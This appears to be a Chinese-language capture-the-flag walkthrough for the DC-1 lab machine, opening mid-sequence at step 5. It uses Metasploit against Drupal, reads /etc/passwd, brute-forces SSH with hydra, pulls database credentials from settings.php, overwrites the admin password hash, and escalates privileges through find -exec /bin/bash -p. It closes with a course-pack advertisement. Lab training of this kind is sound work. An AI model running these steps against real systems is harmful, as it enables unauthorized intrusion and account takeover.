DC系列靶机1通关教程_dc1 靶机

启动msfconsole，搜索search Drupal

5.使用第二个漏洞：use2，使用show missing查看一下必须要设置的选项

看到需要设置rhosts，rhosts就是设置靶机的IP地址

6.使用set 设置 ：set rhosts 192.168.16.153

使用 show options查看设置好的信息

7. 确认设置的信息后输入run开始执行攻击，

meterpreter：是一个用于远程控制计算机的工具，它可以在目标计算机上执行命令、上传和下载文件、截取屏幕等操作。它是Metasploit框架中的一个模块，通常用于渗透测试和漏洞利用。

8.使用ls查看当前目录下所有文件，发现第一个flag 1.txt

**ls：**查看当前目录下所有文件，找到第一个flag后查看内容，cat flag1.txt

9.查看一下靶机的用户，发现有个flag4的用户：cat /etc/passwd

/etc/passwd:存储系统用户账户的信息。

10.使用九头蛇（hydra）来爆破看看是否能拿到密码orange：hydra -l flag4 -P /usr/share/john/password.lst 192.168.16.153 ssh**/usr/share/john/** 是 John the Ripper密码破解工具的默认安装目录。指定攻击的类型是ssh

11. 通过SSH连接到flag4用户 使用flag4账户和密码ssh连接用户 ：ssh flag4@192.168.16.153

12.ls找到了flag4.txt，从而可知还有两个flag还未找到，有可能在web上，因为有开放web服务

13.已经登录进了靶机，查看web的配置文件，因为drupal的配置文件在var/www下的/sites/default/settings.php(百度可知)，先进入var/www ：cd /var/www

14.查看/sites/default/settings.php，在配置中看到了flag2还有数据库的信息：数据库的账号：dbuser密码：R0ck3t数据库是：MySQL

more sites/default/settings.php #批量查看

15.连接数据库：mysql -u dbuser -p

16.查看数据库：show databases;

17. 使用drupaldb数据库 ：use drupaldb;

18.查看数据表 ：show tables;

19.查看user中数据，看到了管理员的密码，但是是哈希值 ：select *  from users;

20. 退出数据库，搜索passwd，quit：退出数据库看到/var/www/scripts下有password-hash.sh：find / -name password*

21.尝试执行password-hash.sh ：scripts/password-hash.sh

22. 尝试在后面加上密码生成哈希值

23. 得到哈希值，将哈希值替换原来admin的哈希值 ：

update users set pass='$S$DoGwUA2Mz3604jbP.rBfrPDDJEzRorCxOMOtWBDnEuW4a1/56GLk
' where name='admin';

24.在web界面尝试登录，找到flag3

25.提权 ：find -name flag4.txt -exec /bin/bash -p ;

这个命令是用于在当前目录及其子录中查找名为 “flag4.txt” 的文件，并且在找到每个文件后执行 /bin/bash -p 命令。 每个部分的含义：

• find：这是一个用于在文件系统中搜索文件和目录的命令。
• -name flag4.txt：这是 find 命令的选项之一，用于指定要搜索的文件名为 “flag4.txt”。
• -exec：这也是 find 命令的选项之一，它允许在找到每个文件后执行指定的命令。
• /bin/bash -p：这是要执行的命令。/bin/bash 是一个常见的 Unix/Linux shell，而 -p 选项表示以特权（即以 root 用户）运行 bash。这将打开一个交互式 shell 环境，具有 root 用户权限。

总结

1. Meterpreter

Meterpreter是Metasploit框架中一种强大的后渗透工具，用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷，可与受感染的目标系统进行远程通信。

Meterpreter的功能强大，灵活性高，提供了很多有用的命令和功能，包括：

1. 进程控制：可查看、创建、终止和注入进程。
2. 文件系统：可以浏览、上传、下载、编辑和删除文件。
3. 系统信息：可获取目标主机的详细信息，如操作系统类型、内核版本等。
4. 网络管理：可以查看网络接口、扫描主机、进行端口转发等操作。
5. 权限提升：可尝试获取更高的权限，如提升到管理员或SYSTEM权限。
6. 持久化：可以在目标系统上建立后门，以确保长期访问权限。
7. 密码破解：可尝试破解保存在目标主机上的密码或凭证。
8. 渗透测试工具：可以使用内置的渗透测试工具，如键盘记录器、截屏、远程桌面等。

Meterpreter通常通过漏洞利用等方式在目标系统上进行部署，并与Metasploit框架进行通信。它提供了一个强大的命令行界面，允许渗透测试人员执行各种后渗透操作来探索目标系统并进一步攻击或保持访问权限。

需要注意的是，Meterpreter是一个强大且潜在危险的工具，只能在合法授权的测试环境中使用，严禁用于非法活动或未经授权的攻击。

2. Metasploit Framework（msf）

Metasploit Framework是一个开源的渗透测试工具集，用于发现安全漏洞、评估系统安全性和进行渗透测试。它由Metasploit项目开发并维护，可运行在多个操作系统上，如Linux、Windows和Mac OS X。

Metasploit Framework提供了一个功能强大的界面和一系列工具，包括：

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。

最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。

最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！下面就开始进入正题，如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图，这里我给大家分享一份打磨了3个月，已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战，这里带来的是SRC资料&HW资料，毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底，我们的最终目的都是为了就业，所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过！